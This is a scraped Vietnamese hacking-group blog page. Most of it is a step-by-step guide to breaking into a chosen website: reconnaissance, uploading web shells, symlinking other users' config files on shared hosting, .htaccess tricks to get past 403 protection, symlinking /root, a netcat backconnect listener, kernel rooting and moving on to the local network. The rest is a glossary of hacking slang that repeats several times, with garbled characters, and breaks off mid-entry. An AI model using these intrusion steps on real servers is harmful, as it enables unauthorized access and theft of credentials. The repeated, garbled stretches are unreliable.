Thôi dừng ở việc local lại.Không viết đến khi nào mới xong.Bạn cứ lượn trên blog VHB 1 tuần.Kiểu gì chả pro local :).
Bước 5.Rooting.
Nếu là server linux thì nên thử Get root nó .Đôi khi thử rooting server lại là con đường ngắn hơn cả local sang.Không phải khi nào cũng local được.Nó bảo mật bá đạo quá thì cũng chịu chết thôi.Hãy thử rooting nếu được.
Tạo một backconnect hoặc có thể bind một port nào đó.MỘt back connect ở đây là server có thể tự connect về mình sau khi mình mở một port đặng biệt nào đó và lắng nghe nó bằng netcat ( nc -l -v -p 4444 ) chẳng hạn.Có khá nhiều shell hỗ trợ back-connect..
Muốn rooting thì phải kiểm tra xem kernel đó có rooting được hay không.Trên shell bạn có thể kiểm tra bằng lện "uname -a" .Lấy phiên bản của kernel nhân được .Tìm trên google xem nó thể exploit đc hay không.
(Có thể vào exploit-db.com/local/ ) để tìm.
Bước 6: Attack Mạng Lan.
Nếu bạn đã chiếm đc 1 server máy chủ rồi.Thì hãy cố gắng thử tấn công các máy cùng mạng Lan với nó.Đây là cơ hội để thể hiện khả năng attack trong mạng Lan của bạn.Cái này khi nào đấy bảo smod Hoangnhatnam của chúng ta demo.Để anh em mở mắt :))
iCarus - VHB Group
Điều đầu tiên mình muốn nói đó là muốn tấn công 1 site.Điều đầu tiên bạn cần có đấy là sự kiên nhẫn.Cóp nhặt từng tí một.Không thể nôn nóng mà bỏ qua nhiều thông tin.Dẫn đến giảm hiệu quả.Không phải website nào tấn công 1 phát cũng là được ngay.Chính vì thế nên phải tích từng đi thông tin một.
Nếu để kiếm một site để check chơi thì tốt nhất là các bạn nên dùng các dork tìm các site có lỗi sẵn.Ví dụ như các dork sqli .Các dork của các phiên bản joomla ,vbulletin có lỗi.Như vậy sẽ hiệu quả hơn là tìm 1 site bất kì rồi xem thử nó có lỗi không. (Ngoài ra còn có một cách nhanh hơn nữa đó là dùng tool scan dork.Nó sẽ tìm cho bạn một khối site bị lỗi có thể check được từ một list dork có sẵn.Cái này hiệu quả hơn cho dân UG lúc tìm shop lỗi.)
Còn nếu bạn muốn tấn công một website xác định.Thì việc này khó hơn.Giả sử victim của bạn có domain là target.com .Để tấn công victim một cách hiệu quả.(Mình nói ở đây là cả đối với host share và private.Site lớn có bảo mật tốt,lẫn site nhỏ,forum. ) .
Bước 1: Lấy thông tin ban đầu.
Lấy thông tin của victim .Bằng các whois nó.Tìm hiểu càng nhiều thông tin về victim càng tốt.Và google ,bing ,yandex .... đều là các công cụ hữu ích.Mình khuyên nên thử với nhiều công cụ tìm kiếm.Vì bản thân thuật toán tìm kiếm của các công cụ này khác nhau nên dẫn đến cho nhiều kết quả với hiệu quả khác nhau.
Ví dụ như nhập vào công cụ search như sau
ip:123.101.11.122 id=
Nó sẽ cho ta một số thông tin thú vị.Bạn hãy cố gắng thu thập thông tin ban đầu càng nhiều càng tốt.Chủ sở hữu domain.Admin của website.Support.Kể cả số điện thoại , facebook,gmail ,yahoo, địa chỉ mail của công ty.1 Attacker giỏi là một attacker có khả năng tận dụng mọi sơ hở.Mọi điểm yếu có thể tấn công.
Bước 2 : Phân tích khả năng tấn công.
Đầu tiên là nên scan victim chính.Scan victim chính là công việc chủ đạo.Đối với site nằm trong server private của các công ty lớn.Thì đây là bước đóng vai trò quyết định bạn có thể attack được nó hay không.
Công cụ scan khá nhiều.Mình giới thiệu bạn 1 số bộ như acunetix Vulnerablility Scanner . OpenVas (của backtrack ) , w3af ( của backtrack ) , nessus (của backtrack ), wpscan ( scan wordpress trong backtrack ) , joomlascan ( scan bug joomla trong backtrack , uniscan ( trong backtrack ) ... ngồi mà kể hết các bộ công cụ chắc đến sáng mai.Công cụ thì nhiều nhưng các bạn nên chọn lựa.Đối với victim nào nên dùng bộ nào.Và nên dùng kết hợp.Vì như mình đã nói.Với mỗi tool khác nhau nó dùng cơ chế ,thuật toán scan khác nhau.Nên hiệu quả nó cũng khác nhau.Từ kết quả scan được.Nó cho ta định hình phải tấn công như thế nào.
Scan server.Scan lấy thông tin về server.Ví dụ như xem server dùng hệ điều hành gì.Sử dụng Apache ,SII phiên bản bao nhiêu. Được viết trên ASP hay PHP .Port nào mở.(Để scan port thì có thể dùng nmap.Nó là công cụ rất hiệu quả).
Mọi thông tin về phiên bản,port bạn hãy google ngay.Hoặc vào exploit-db.com xem nó có thể bị attack thông qua nó hay không.Còn không bạn có thể lưu lại thông tin.Rồi sau đó kiểm tra 1 lần xem sao.Đây là các bước rất cần thiết đối với việc tấn công 1 website lớn.
Đối với Server share host.Phân tích khả năng tấn công .Đây cũng là một bước rất quan trọng.Nó rút ngắn thời gian tấn công của bạn.Nhưng mang lại hiệu quả cao.
Mình thấy đa số (Và trước đây mình cũng vậy ). Đó là để tấn công 1 website ko bị lỗi ,Không có lỗ hổng.Mình thường reserve ip của server chứa victim.Rồi mở từng site check xem có sqli hay không.
Đồng ý là sqli rất nhiều.Và rất dễ khai thác.Nhưng không phải lúc nào mình cũng có thể may mắn.Check 1 cái là ra link bị lỗi ngay.Nếu scan toàn bộ site thì đến bao giờ mới xong.Có một cách rút ngắn quá trình này đó là xác định loại site cần tấn công.
Mình ví dụ.Bạn có kinh nghiệm về check wordpress.Bạn muốn tìm các site trong server sử dùng mã nguồn này để tấn công.Sau đó local sang victim chính.Hãy dùng google với dork là
ip:112.78.2.247 "wordpress"
Như đây mình nhận được một victim trong server này sử dụng wordpresss http://www.saigoncanho.com.vn/
Tương tự cho các mã nguồn khác cũng vậy.
Bước 3: Tấn công.
Đây là bước nhiều nhất,Nhưng mình nói ít nhất,ví nó có quá nhiều kiểu tấn công.Biết nói thế nào cho hết được.
Chỉ đúc kết một số kinh nghiệm.Ví dụ như đối với forum vbb chẳng hạn.Nhiều phiên bản thực sự không có bug.Nhưng không phải vì thế mà ta bỏ qua.Hãy xem các web application của nó.Ví dụ như các mod.Đối với joomla và các mã nguồn khác cũng vậy.Hãy xem cách extension đi theo.Chúng rất hay bị lỗi.Bởi vì đây đa số là các ứng dụng tích hợp được viết bởi các web developer việt nam.Chúng rất kém trong việc bảo mật.
Tận dụng tối đa kết quả mà các bạn scan ở trên.Ví dụ như bạn scan được server dùng apache 2.1 chẳng hạn.Hãy xem nó là bản update chưa.Nếu chưa có lỗi để khai thác không.Tấn công vào nó.Xem thông tin từ các lỗi public trên google mà tấn công.Hãy cố gắng tấn công 1 cách từ từ.
Xem trong cấu trúc site khi scan được .Chỗ nào là khai thác được.Ví dụ như chúng để lại database back up trên site chẳng hạn.Tải về và phân tích ngay.
Nhiều bộ công cụ scan nó scan đến từng lỗi nhỏ.Như tìm vị trí có thể up ảnh, up file bẳng hạn.Hãy cố bypass up shell thử xem.
Ở mục này có quá nhiều cái để nói.Và thực chất đa số mọi tut hack thường nói về phần này.Nên mình để phần này cho các bạn.Hãy cố gắng tích hợp càng nhiều kinh nghiệm phần này .Càng nhiều càng tốt.Các phần khác nó đi theo 1 qui luật nhất định.Có thể đối với victim nào bạn cũng làm như thế.Nhưng đối với phần này.Nó phụ thuộc vào nhiều thứ.Phụ thuộc vào kết quả scan được.Phụ thuộc vào những đối tượng khác nhau.Nên nó rất đa dạng.
Kết quả ở phần này.Là bạn có thể có được tài khoản admin.Up được shell.
Bước 4: Nếu tấn công được trực tiếp target rồi thì không nói làm gì.Nếu tấn công đc một site nằm cùng server.Thì bước tiếp theo là local.Về vấn đề local này cũng khá rộng.Mình chỉ nói qua một phần trong đó.
Trong local thì symlink là một kiểu local phổ biến nhất ,Được dùng nhiều nhất.Nó như là một shortcut bên window.Góp phần làm nhanh quá trình gọi chạy một file.Nếu như gọi trực tiếp hardlink thì quá trình họat động của server sẽ chậm hẳng.
Trong phương pháp local.Mục đích chính của chúng ta là đọc / lấy các file config (hoặc 1 file config của target cần tấn công ). Việc thực hiện đầu tiên là chúng ta thường đọc file /etc/passwd để xác định tất cả các user nằm trong server ( Và không phải server nào cũng cho ta thực hiện đc.Phải bypass ).
Để đọc file config ta còn phải nắm các mã nguồn.Với mỗi mã nguồn khác nhau thì file config nó nằm ở một vị trí khác nhau.
Mình đưa ra một số file config đối với một số mã nguồn tương ứng.
vBulletin : /includes/config.php
IPB : /conf_global.php
MyBB: /inc/config.php
Phpbb: /config.php
Php Nuke : /config.php
Php-Fusion : config.php
SMF : /Settings.php
Joomla : configuration.php
WordPress : /wp-config.php
Drupal: /sites/default/settings.php
Oscommerce: /includes/configure.php
Từ đây ta hình dung được đường dẫn chính xác dẫn đến file config của victim.Từ đó có thể symlink được chính xác file cần đọc. (Nếu như victim đổi vị trí của file config.Thì ta phải ngồi symlink mò.Symlink từ index nó,đến những file khác,xem nó include những file nào .Từ file này dò đến file kia.Đối với một attacker kinh nghiệm.Thì việc bảo mật bằng cách giấu file config của victim đôi khi không hiệu quả.
Cấu trúc lệnh symlink (để symlink file có địa chỉ là /home/usertarget/public_html/includes/config.php target.txt
lệnh này symlink file config về file target.txt nằm ở thư mục ta đang symlink. Ở điều kiện tốt nhất ta có thể đọc đc file target.txt này trên host ta đặt shell.
Nhưng không phải khi nào ta cũng có điều kiện tốt như vậy. Chủ của website có thể chmod không cho ta đọc file config (100,101,400... ) chẳng han.Tùy server.Hoặc chủ website đặt tại thư mục chứa file config đấy 1 file .htaccess có nội dung như sau.
<Files config.php>
order allow, deny
deny from all
</Files>
Nếu chủ site đặc như thế thì khi symlink ta sẽ nhận được thông báo là 403 Forbidden Error.
Ở bài này mình chỉ nói đến tư tưởng tấn công chứ không nói chi tiết về phương pháp tấn công.Nên mình chỉ nêu 1 vài ví dụ.
Nếu như ta không đọc được thì sao.Ta phải suy nghĩ vì sao không đọc được.Tư duy đặt trường hợp ta vào vị trí admin của victim.Nếu là ta ,ta sẽ bảo mật như thế nào.Sẽ làm gì.Từ đó ta có những biện pháp khác nhau.
Giả sử như ta tìm giải pháp để bypass 403 forbidden error do chủ website đặt file .htaccess chẳng hạn nhé.
Trên host ta đặt shell.Tạo một thư mực có tên là VHBSYSTEM chẳng hạn.Đường dẫn đầy đủ của nó ví dụ như sau : /home/attacker/public_html/VHBSYSTEM/ .Chmod lại thư mục này là 777 (lúc đầu chưa cần.Nếu không được hẵn thử ). Sau đó tạo một file .htaccess với nội dung như sau
HeaderName vhb.txt
Đặt file .htaccess này vào thư mục /home/attacker/public_html/ . Nếu ta symlink file config vào file vhb.txt với cấu trúc lệnh ln -s /home/victim/public_html/includes/config.php vhb.txt
Thì sau khi symlink xong .Ta vào thư mục VHBSYSTEM và đọc file vhb.txt vừa symlink về.Nó sẽ bypass được.
Đây chỉ là 1 ví dụ trong nhiều cách bypass.Nhiều bạn bảo local phải có tư duy.Nhưng mình nghĩ muốn local tốt thì phải biết nhiều cách bypass trong trường hợp không đọc được file.
Vấn đề này bạn nên tham khảo thêm ở nhiều tài liệu được share trong VHB. ( hoặc ghé thăm vhbgr0up.blogspot.com )
Trong các cách cũng được khá nhiều người dung.Nhưng dùng symlink all config ( cái này trên blog và forum của vhb cũng có nói rồi ). Sym root bằng cách tạo sym root ở một server linux nào đó .Sau đó tar lại.Up lên server cần local.Cái này trên VHB cũng nhiều bài nói đến rồi.
Mình đề cập thêm việc sym root ngay trực tiếp trên server.Đôi khi nó khá hiệu quả trong việc bypass security.
Như khi nãy.Tạo một folder VHB để tiện xử lí.Link full của nó /home/attacker/public_html/VHB .Sau đó ta thực hiện symlink trên shell như sau " ln -s /root" . Sau đó ta chọn một victim có domain là target.com chẳng hạn.Tiếp tục type "ls -la /etc/valiases/target.com" .Sau ddos quay lại folder ta vừa tạo VHB.Đặt vào đấy 1 file htaccess có nội dung như sau
Options Indexes FollowSymLinks
DirectoryIndex index.htm
AddType txt .php
AddHandler txt .php
Bây giờ ta vào xem ta symlink được những gì.Nếu như chỗ nào nó báo permisssion access.Thì cũng đừng lo lắng bận tâm.Hãy vào sâu hơn.Giả sử ta cần xem target.com có user lấy được ở trên là target đi.
Thì ta xem nó với link sau attacker.com/VHB/root/home/target/public_html/ ......
Đôi khi xem không được thì có thể view source lên nhé.
Thôi dừng ở việc local lại.Không viết đến khi nào mới xong.Bạn cứ lượn trên blog VHB 1 tuần.Kiểu gì chả pro local :).
Bước 5.Rooting.
Nếu là server linux thì nên thử Get root nó .Đôi khi thử rooting server lại là con đường ngắn hơn cả local sang.Không phải khi nào cũng local được.Nó bảo mật bá đạo quá thì cũng chịu chết thôi.Hãy thử rooting nếu được.
Tạo một backconnect hoặc có thể bind một port nào đó.MỘt back connect ở đây là server có thể tự connect về mình sau khi mình mở một port đặng biệt nào đó và lắng nghe nó bằng netcat ( nc -l -v -p 4444 ) chẳng hạn.Có khá nhiều shell hỗ trợ back-connect..
Muốn rooting thì phải kiểm tra xem kernel đó có rooting được hay không.Trên shell bạn có thể kiểm tra bằng lện "uname -a" .Lấy phiên bản của kernel nhân được .Tìm trên google xem nó thể exploit đc hay không.
(Có thể vào exploit-db.com/local/ ) để tìm.
Bước 6: Attack Mạng Lan.
Nếu bạn đã chiếm đc 1 server máy chủ rồi.Thì hãy cố gắng thử tấn công các máy cùng mạng Lan với nó.Đây là cơ hội để thể hiện khả năng attack trong mạng Lan của bạn.Cái này khi nào đấy bảo smod Hoangnhatnam của chúng ta demo.Để anh em mở mắt :))
iCarus - VHB Group
M?t v�i thu?t ng? hacking
newbie area vhb vhb? DDoS =
Distributed Denial of Service
? DrDoS =
Distributed Reflected Denial of Service Attack, uses a list of reflection servers or other methods such as DNS to spoof an attack to look like it's coming from multiple ips. Amplification of power in the attack COULD occur.
? FTP =
File Transfer Protocol. Used for transferring files over an FTP server.
? FUD =
Fully Undetectable
? Hex =
In computer science, hexadecimal refers to base-16 numbers. These are numbers that use digits in the range: 0123456789ABCDEF. In the C programming language (as well as Java, JavaScript, C++, and other places), hexadecimal numbers are prefixed by a 0x. In this manner, one can tell that the number 0x80 is equivalent to 128 decimal, not 80 decimal.
? HTTP =
Hyper Text Transfer Protocol. The foundation of data communication for the World Wide Web.
? IRC =
Internet Relay Chat. Transmiting text messages in real time between online users.
? JDB =
Java drive-by, a very commonly used web-based exploit which allows an attacker to download and execute malicious code locally on a slave's machine through a widely known java vulnerability.
? Malware =
Malicious Software
? Nix =
Unix based operating system, usually refered to here when refering to DoS'ing.
? POP3 =
This is the most popular protocol for picking up e-mail from a server.
? R.A.T = Remote Administration Tool
? SDB =
Silent drive-by, using a zero day web-based exploit to hiddenly and un-detectably download and execute malicious code on a slave's system. (similar to a JDB however no notification or warning is given to the user)
? SE =
Social Engineering
? Skid =
Script Kid/Script Kiddie
? SMTP =
A TCP/IP protocol used in sending and receiving e-mail.
? SQL =
Structured Query Language. It's a programming language, that used to communicate with databases and DBMS. Can go along with a word after it, such as "SQL Injection."
? SSH =
Secure Shell, used to connect to Virtual Private Servers.
? TCP =
Transmission Control Protocol, creates connections and exchanges packets of data.
? UDP =
User Datagram Protocol, An alternative data transport to TCP used for DNS, Voice over IP, and file sharing.
? VPN =
Virtual Private Network
? VPS =
Virtual Private Server
? XSS (CSS) =
Cross Site Scripting
Words
Algorithm =
A series of steps specifying which actions to take in which order.
ANSI Bomb =
ANSI.SYS key-remapping commands consist of cryptic-looking text that specifies, using ansi numeric codes to redefine keys.
Back Door =
Something a hacker leaves behind on a system in order to be able to get back in at a later time.
Binary =
A numbering system in which there are only two possible values for each digit: 0 and 1.
Black Hat =
A hacker who performs illegal actions to do with hacking online. (Bad guy, per se)
Blue Hat =
A blue hat hacker is someone outside computer security consulting firms who is used to bug test a system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term BlueHat to represent a series of security briefing events.
Bot =
A piece of malware that connects computer to an attacker commonly using the HTTP or IRC protocal to await malicous instructions.
Botnet =
Computers infected by worms or Trojans and taken over by hackers and brought into networks to send spam, more viruses, or launch denial of service attacks.
Buffer Overflow =
A classic exploit that sends more data than a programmer expects to receive. Buffer overflows are one of the most common programming errors, and the ones most likely to slip through quality assurance testing.
Cracker =
A specific type of hacker who decrypts passwords or breaks software copy protection schemes.
DDoS =
Distributed denial of service. Flooding someones connection with packets. Servers or web-hosted shells can send packets to a connection on a website usually from a booter.
Deface =
A website deface is an attack on a site that changes the appearance of the site or a certain webpage on the site.
Dictionary Attack =
A dictionary attack is an attack in which a cyber criminal can attempt to gain your account password. The attack uses a dictionary file, a simple list of possible passwords, and a program which fills them in. The program just fills in every single possible password on the list, untill it has found the correct one. Dictionary files usually contain the most common used passwords.
DOX =
Personal information about someone on the Internet usualy contains real name, address, phone number, SSN, credit card number, etc.
E-Whore =
A person who manipulates other people to believe that he/she is a beautiful girl doing cam shows or selling sexual pictures to make money.
Encryption = I
n cryptography, encryption applies mathematical operations to data in order to render it incomprehensible. The only way to read the data is apply the reverse mathematical operations. In technical speak, encryption is applies mathematical algorithms with a key that converts plaintext to ciphertext. Only someone in possession of the key can decrypt the message.
Exploit =
A way of breaking into a system. An exploit takes advantage of a weakness in a system in order to hack it.
FUD =
Fully undetectable, can be used in many terms. Generally in combination with crypters, or when trying to infect someone.
Grey Hat =
A grey hat hacker is a combination of a Black Hat and a White Hat Hacker. A Grey Hat Hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has been hacked, for example. Then they may offer to repair their system for a small fee.
Hacker (definition is widely disputed among people...) = A hacker is someone who is able to manipulate the inner workings of computers, information, and technology to work in his/her favor.
Hacktivist =
A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks.
IP Address =
On the Internet, your IP address is the unique number that others use to send you traffic.
IP Grabber =
A link that grabs someone's IP when they visit it.
Keylogger =
A software program that records all keystrokes on a computer's keyboard, used as a surveillance tool or covertly as spyware.
Leach = A cultural term in the warez community referring to people who download lots of stuff but never give back to the community.
LOIC/HOIC =
Tool(s) used by many anonymous members to conduct DDoS attacks. It is not recommended to use these under any circumstances.
Malware =
Software designed to do all kinds of evil stuff like stealing identity information, running DDoS attacks, or soliciting money from the slave.
Neophyte =
A neophyte, "n00b", or "newbie" is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology, and hacking.
smith =
Somebody new to a forum/game.
OldFag =
Somebody who's been around a forum/game for a long time.
Packet =
Data that is sent across the Internet is broken up into packets, sent individually across the network, and reassembled back into the original data at the other end.
Phreak =
Phone Freaks. Hackers who hack cell phones for free calling. Free Long distance calling. Etc.
Phreaking =
The art and science of cracking the phone network.
Proxy =
A proxy is something that acts as a server, but when given requests from clients, acts itself as a client to the real servers.
Rainbow Table =
A rainbow table is a table of possible passwords and their hashes. It is way faster to crack a password using rainbow tables then using a dictionary attack (Bruteforce).
Remote Administration Tool =
A tool which is used to remotely control (an)other machine(s). These can be used for monitoring user actions, but often misused by cyber criminals as malware, to get their hands on valuable information, such as log in credentials.
Resolver =
Software created to get an IP address through IM (instant messenger, like Skype/MSN) programs.
Reverse Engineering =
A technique whereby the hacker attempts to discover secrets about a program. Often used by crackers, and in direct modifications to a process/application.
Root =
Highest permission level on a computer, able to modify anything on the system without restriction.
Rootkit (ring3 ring0) =
A powerful exploit used by malware to conceal all traces that it exists. Ring3 - Can be removed easily without booting in safemode. Ring0 - Very hard to remove and very rare in the wild, these can require you to format, it's very hard to remove certain ring0 rootkits without safemode.
Script Kiddie =
A script kid, or skid is a term used to describe those who use scripts created by others to hack computer systems and websites. Used as an insult, meaning that they know nothing about hacking.
Shell =
The common meaning here is a hacked web server with a DoS script uploaded to conduct DDoS attacks via a booter. OR A shell is an script-executing unit - Something you'd stick somewhere in order to execute commands of your choice.
Social Engineer =
Social engineering is a form of hacking that targets people's minds rather than their computers. A typical example is sending out snail mail marketing materials with the words "You may already have won" emblazoned across the outside of the letter. As you can see, social engineering is not unique to hackers; it's main practitioners are the marketing departments of corporations.
Spoof =
The word spoof generally means the act of forging your identity. More specifically, it refers to forging the sender's IP address (IP spoofing). (Spoofing an extension for a RAT to change it from .exe to .jpg, etc.)
SQL Injection =
An SQL injection is a method often used to hack SQL databases via a website, and gain admin control (sometimes) of the site. You can attack programs with SQLi too.
Trojan =
A Trojan is a type of malware that masquerades as a legitimate file or helpful program with the ultimate purpose of granting a hacker unauthorized access to a computer.
VPS =
The term is used for emphasizing that the virtual machine, although running in software on the same physical computer as other customers' virtual machines, is in many respects functionally
equivalent to a separate physical computer, is dedicated to the individual customer's needs, has the privacy of a separate physical computer, and can be configured to run server software.
Warez =
Software piracy
White Hat =
A "white hat" refers to an ethical hacker, or a computer security expert, who specializes in penetration testing and in other testing methods to ensure the security of a businesses information systems. (Good guy, per se)
Worm =
Software designed to spread malware with little to no human interaction.
Zero Day Exploit =
An attack that exploits a previously unknown vulnerability in a computer application, meaning that the attack occurs on "day zero" of awareness of the vulnerability. This means that the developers have had zero days to address and patch the vulnerability.
Capuchino - VHB Group
Distributed Denial of Service
? DrDoS =
Distributed Reflected Denial of Service Attack, uses a list of reflection servers or other methods such as DNS to spoof an attack to look like it's coming from multiple ips. Amplification of power in the attack COULD occur.
? FTP =
File Transfer Protocol. Used for transferring files over an FTP server.
? FUD =
Fully Undetectable
? Hex =
In computer science, hexadecimal refers to base-16 numbers. These are numbers that use digits in the range: 0123456789ABCDEF. In the C programming language (as well as Java, JavaScript, C++, and other places), hexadecimal numbers are prefixed by a 0x. In this manner, one can tell that the number 0x80 is equivalent to 128 decimal, not 80 decimal.
? HTTP =
Hyper Text Transfer Protocol. The foundation of data communication for the World Wide Web.
? IRC =
Internet Relay Chat. Transmiting text messages in real time between online users.
? JDB =
Java drive-by, a very commonly used web-based exploit which allows an attacker to download and execute malicious code locally on a slave's machine through a widely known java vulnerability.
? Malware =
Malicious Software
? Nix =
Unix based operating system, usually refered to here when refering to DoS'ing.
? POP3 =
This is the most popular protocol for picking up e-mail from a server.
? R.A.T = Remote Administration Tool
? SDB =
Silent drive-by, using a zero day web-based exploit to hiddenly and un-detectably download and execute malicious code on a slave's system. (similar to a JDB however no notification or warning is given to the user)
? SE =
Social Engineering
? Skid =
Script Kid/Script Kiddie
? SMTP =
A TCP/IP protocol used in sending and receiving e-mail.
? SQL =
Structured Query Language. It's a programming language, that used to communicate with databases and DBMS. Can go along with a word after it, such as "SQL Injection."
? SSH =
Secure Shell, used to connect to Virtual Private Servers.
? TCP =
Transmission Control Protocol, creates connections and exchanges packets of data.
? UDP =
User Datagram Protocol, An alternative data transport to TCP used for DNS, Voice over IP, and file sharing.
? VPN =
Virtual Private Network
? VPS =
Virtual Private Server
? XSS (CSS) =
Cross Site Scripting
Words
Algorithm =
A series of steps specifying which actions to take in which order.
ANSI Bomb =
ANSI.SYS key-remapping commands consist of cryptic-looking text that specifies, using ansi numeric codes to redefine keys.
Back Door =
Something a hacker leaves behind on a system in order to be able to get back in at a later time.
Binary =
A numbering system in which there are only two possible values for each digit: 0 and 1.
Black Hat =
A hacker who performs illegal actions to do with hacking online. (Bad guy, per se)
Blue Hat =
A blue hat hacker is someone outside computer security consulting firms who is used to bug test a system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term BlueHat to represent a series of security briefing events.
Bot =
A piece of malware that connects computer to an attacker commonly using the HTTP or IRC protocal to await malicous instructions.
Botnet =
Computers infected by worms or Trojans and taken over by hackers and brought into networks to send spam, more viruses, or launch denial of service attacks.
Buffer Overflow =
A classic exploit that sends more data than a programmer expects to receive. Buffer overflows are one of the most common programming errors, and the ones most likely to slip through quality assurance testing.
Cracker =
A specific type of hacker who decrypts passwords or breaks software copy protection schemes.
DDoS =
Distributed denial of service. Flooding someones connection with packets. Servers or web-hosted shells can send packets to a connection on a website usually from a booter.
Deface =
A website deface is an attack on a site that changes the appearance of the site or a certain webpage on the site.
Dictionary Attack =
A dictionary attack is an attack in which a cyber criminal can attempt to gain your account password. The attack uses a dictionary file, a simple list of possible passwords, and a program which fills them in. The program just fills in every single possible password on the list, untill it has found the correct one. Dictionary files usually contain the most common used passwords.
DOX =
Personal information about someone on the Internet usualy contains real name, address, phone number, SSN, credit card number, etc.
E-Whore =
A person who manipulates other people to believe that he/she is a beautiful girl doing cam shows or selling sexual pictures to make money.
Encryption = I
n cryptography, encryption applies mathematical operations to data in order to render it incomprehensible. The only way to read the data is apply the reverse mathematical operations. In technical speak, encryption is applies mathematical algorithms with a key that converts plaintext to ciphertext. Only someone in possession of the key can decrypt the message.
Exploit =
A way of breaking into a system. An exploit takes advantage of a weakness in a system in order to hack it.
FUD =
Fully undetectable, can be used in many terms. Generally in combination with crypters, or when trying to infect someone.
Grey Hat =
A grey hat hacker is a combination of a Black Hat and a White Hat Hacker. A Grey Hat Hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has been hacked, for example. Then they may offer to repair their system for a small fee.
Hacker (definition is widely disputed among people...) = A hacker is someone who is able to manipulate the inner workings of computers, information, and technology to work in his/her favor.
Hacktivist =
A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks.
IP Address =
On the Internet, your IP address is the unique number that others use to send you traffic.
IP Grabber =
A link that grabs someone's IP when they visit it.
Keylogger =
A software program that records all keystrokes on a computer's keyboard, used as a surveillance tool or covertly as spyware.
Leach = A cultural term in the warez community referring to people who download lots of stuff but never give back to the community.
LOIC/HOIC =
Tool(s) used by many anonymous members to conduct DDoS attacks. It is not recommended to use these under any circumstances.
Malware =
Software designed to do all kinds of evil stuff like stealing identity information, running DDoS attacks, or soliciting money from the slave.
Neophyte =
A neophyte, "n00b", or "newbie" is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology, and hacking.
smith =
Somebody new to a forum/game.
OldFag =
Somebody who's been around a forum/game for a long time.
Packet =
Data that is sent across the Internet is broken up into packets, sent individually across the network, and reassembled back into the original data at the other end.
Phreak =
Phone Freaks. Hackers who hack cell phones for free calling. Free Long distance calling. Etc.
Phreaking =
The art and science of cracking the phone network.
Proxy =
A proxy is something that acts as a server, but when given requests from clients, acts itself as a client to the real servers.
Rainbow Table =
A rainbow table is a table of possible passwords and their hashes. It is way faster to crack a password using rainbow tables then using a dictionary attack (Bruteforce).
Remote Administration Tool =
A tool which is used to remotely control (an)other machine(s). These can be used for monitoring user actions, but often misused by cyber criminals as malware, to get their hands on valuable information, such as log in credentials.
Resolver =
Software created to get an IP address through IM (instant messenger, like Skype/MSN) programs.
Reverse Engineering =
A technique whereby the hacker attempts to discover secrets about a program. Often used by crackers, and in direct modifications to a process/application.
Root =
Highest permission level on a computer, able to modify anything on the system without restriction.
Rootkit (ring3 ring0) =
A powerful exploit used by malware to conceal all traces that it exists. Ring3 - Can be removed easily without booting in safemode. Ring0 - Very hard to remove and very rare in the wild, these can require you to format, it's very hard to remove certain ring0 rootkits without safemode.
Script Kiddie =
A script kid, or skid is a term used to describe those who use scripts created by others to hack computer systems and websites. Used as an insult, meaning that they know nothing about hacking.
Shell =
The common meaning here is a hacked web server with a DoS script uploaded to conduct DDoS attacks via a booter. OR A shell is an script-executing unit - Something you'd stick somewhere in order to execute commands of your choice.
Social Engineer =
Social engineering is a form of hacking that targets people's minds rather than their computers. A typical example is sending out snail mail marketing materials with the words "You may already have won" emblazoned across the outside of the letter. As you can see, social engineering is not unique to hackers; it's main practitioners are the marketing departments of corporations.
Spoof =
The word spoof generally means the act of forging your identity. More specifically, it refers to forging the sender's IP address (IP spoofing). (Spoofing an extension for a RAT to change it from .exe to .jpg, etc.)
SQL Injection =
An SQL injection is a method often used to hack SQL databases via a website, and gain admin control (sometimes) of the site. You can attack programs with SQLi too.
Trojan =
A Trojan is a type of malware that masquerades as a legitimate file or helpful program with the ultimate purpose of granting a hacker unauthorized access to a computer.
VPS =
The term is used for emphasizing that the virtual machine, although running in software on the same physical computer as other customers' virtual machines, is in many respects functionally
equivalent to a separate physical computer, is dedicated to the individual customer's needs, has the privacy of a separate physical computer, and can be configured to run server software.
Warez =
Software piracy
White Hat =
A "white hat" refers to an ethical hacker, or a computer security expert, who specializes in penetration testing and in other testing methods to ensure the security of a businesses information systems. (Good guy, per se)
Worm =
Software designed to spread malware with little to no human interaction.
Zero Day Exploit =
An attack that exploits a previously unknown vulnerability in a computer application, meaning that the attack occurs on "day zero" of awareness of the vulnerability. This means that the developers have had zero days to address and patch the vulnerability.
Capuchino - VHB Group
Một vài thuật ngữ hacking
newbie area vhb vhb★ DDoS =
Distributed Denial of Service
★ DrDoS =
Distributed Reflected Denial of Service Attack, uses a list of reflection servers or other methods such as DNS to spoof an attack to look like it's coming from multiple ips. Amplification of power in the attack COULD occur.
★ FTP =
File Transfer Protocol. Used for transferring files over an FTP server.
★ FUD =
Fully Undetectable
★ Hex =
In computer science, hexadecimal refers to base-16 numbers. These are numbers that use digits in the range: 0123456789ABCDEF. In the C programming language (as well as Java, JavaScript, C++, and other places), hexadecimal numbers are prefixed by a 0x. In this manner, one can tell that the number 0x80 is equivalent to 128 decimal, not 80 decimal.
★ HTTP =
Hyper Text Transfer Protocol. The foundation of data communication for the World Wide Web.
★ IRC =
Internet Relay Chat. Transmiting text messages in real time between online users.
★ JDB =
Java drive-by, a very commonly used web-based exploit which allows an attacker to download and execute malicious code locally on a slave's machine through a widely known java vulnerability.
★ Malware =
Malicious Software
★ Nix =
Unix based operating system, usually refered to here when refering to DoS'ing.
★ POP3 =
This is the most popular protocol for picking up e-mail from a server.
★ R.A.T = Remote Administration Tool
★ SDB =
Silent drive-by, using a zero day web-based exploit to hiddenly and un-detectably download and execute malicious code on a slave's system. (similar to a JDB however no notification or warning is given to the user)
★ SE =
Social Engineering
★ Skid =
Script Kid/Script Kiddie
★ SMTP =
A TCP/IP protocol used in sending and receiving e-mail.
★ SQL =
Structured Query Language. It's a programming language, that used to communicate with databases and DBMS. Can go along with a word after it, such as "SQL Injection."
★ SSH =
Secure Shell, used to connect to Virtual Private Servers.
★ TCP =
